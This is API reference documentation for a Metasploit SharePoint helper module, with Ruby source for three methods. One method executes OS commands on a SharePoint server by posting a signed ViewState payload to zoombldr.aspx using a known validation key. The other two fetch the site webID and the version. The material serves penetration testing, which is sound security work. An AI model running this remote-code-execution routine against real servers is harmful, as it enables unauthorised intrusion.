Module: Msf::Exploit::Remote::HTTP::Sharepoint

Includes:
Msf::Exploit::Remote::HttpClient, ViewState
Defined in:
lib/msf/core/exploit/remote/http/sharepoint.rb

Overview

This module provides a way of interacting with sharepoint installations

Instance Attribute Summary

Attributes included from Msf::Exploit::Remote::HttpClient

#client, #cookie_jar

Instance Method Summary collapse

Methods included from ViewState

#can_sign_viewstate?, #decode_viewstate, #extract_viewstate, #extract_viewstate_generator, #extract_viewstate_validation_key, #generate_viewstate, #generate_viewstate_hmac, #generate_viewstate_payload, #initialize, #pack_viewstate_generator, #pack_viewstate_validation_key

Methods included from Msf::Exploit::Remote::HttpClient

#basic_auth, #cleanup, #configure_http_login_scanner, #connect, #connect_ws, #deregister_http_client_options, #disconnect, #download, #full_uri, #handler, #http_fingerprint, #initialize, #lookup_http_fingerprints, #normalize_uri, #path_from_uri, #peer, #proxies, #reconfig_redirect_opts!, #request_opts_from_url, #request_url, #rhost, #rport, #send_request_cgi, #send_request_cgi!, #send_request_raw, #service_details, #setup, #ssl, #ssl_version, #sslkeylogfile, #strip_tags, #target_uri, #validate_fingerprint, #vhost

Methods included from Auxiliary::LoginScanner

#configure_login_scanner

Methods included from Auxiliary::Report

#active_db?, #create_cracked_credential, #create_credential, #create_credential_and_login, #create_credential_login, #db, #db_warning_given?, #get_client, #get_host, #inside_workspace_boundary?, #invalidate_login, #mytask, #myworkspace, #myworkspace_id, #report_auth_info, #report_client, #report_exploit, #report_host, #report_loot, #report_note, #report_service, #report_vuln, #report_web_form, #report_web_page, #report_web_site, #report_web_vuln, #store_cred, #store_local, #store_loot

Methods included from Metasploit::Framework::Require

optionally, optionally_active_record_railtie, optionally_include_metasploit_credential_creation, #optionally_include_metasploit_credential_creation, optionally_require_metasploit_db_gem_engines

Instance Method Details

#sharepoint_execute_command_via_viewstate(cmd, validation_key, http_request_opts = {}) ⇒ nil

Execute an operating system command by crafting and sending a viewstate to the remote server. In order for this to work, the validation_key must be known.

Parameters:

  • cmd (String)

    The OS command to run on the remote system

  • validation_key (String)

    The remote system's validation key from the web.config file.

  • http_request_opts (Hash) (defaults to: {})

    Options to override the defaults of the HTTP request.

Returns:

  • (nil)

    This function doesn't return anything.

Raises:

  • (RuntimeError)

    This function will raise a RuntimeError via #fail_with if the command failed to execute.

[View source]

24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
# File 'lib/msf/core/exploit/remote/http/sharepoint.rb', line 24

def sharepoint_execute_command_via_viewstate(cmd, validation_key, http_request_opts = {})
  vprint_status("Executing command: #{cmd}")

  res = send_request_cgi(http_request_opts.merge({
    'method' => 'POST',
    'uri' => normalize_uri(target_uri.path, '/_layouts/15/zoombldr.aspx'),
    'vars_post' => {
      '__VIEWSTATE' => generate_viewstate_payload(
        cmd,
        extra: pack_viewstate_generator('63E6434F'), # /_layouts/15/zoombldr.aspx
        algo: 'sha256',
        key: pack_viewstate_validation_key(validation_key)
      )
    }
  }))

  unless res
    fail_with(Failure::Unreachable, "Target did not respond to #{__method__}")
  end

  unless res.code == 200
    fail_with(Failure::PayloadFailed, "Failed to execute command: #{cmd}")
  end

  vprint_good('Successfully executed command')
end

#sharepoint_get_site_web_id(http_request_opts = {}) ⇒ String?

Get the site’s webID.

Parameters:

  • http_request_opts (Hash) (defaults to: {})

    Options to override the defaults of the HTTP request.

Returns:

  • (String, nil)

    The webID if it was able to be recovered.

[View source]

55
56
57
58
59
60
61
62
63
64
# File 'lib/msf/core/exploit/remote/http/sharepoint.rb', line 55

def sharepoint_get_site_web_id(http_request_opts = {})
  res = send_request_cgi(http_request_opts.merge({
    'method' => 'GET',
    'uri' => normalize_uri(target_uri.path, '_api', 'web', 'id')
  }))

  return nil unless res&.code == 200

  res.get_xml_document.at('//d:Id')&.text
end

#sharepoint_get_version(http_request_opts = {}) ⇒ Rex::Version?

Get the SharePoint version number.

Parameters:

  • http_request_opts (Hash) (defaults to: {})

    Options to override the defaults of the HTTP request.

Returns:

  • (Rex::Version, nil)

    The SharePoint version if it was able to be recovered.

See Also:

[View source]

72
73
74
75
76
77
78
79
80
81
# File 'lib/msf/core/exploit/remote/http/sharepoint.rb', line 72

def sharepoint_get_version(http_request_opts = {})
  res = send_request_cgi(http_request_opts.merge({
    'method' => 'GET',
    'uri' => normalize_uri(target_uri.path)
  }))

  return nil unless /^(?<build>[\d.]+)/ =~ res&.headers['MicrosoftSharePointTeamServices']

  Rex::Version.new(build)
end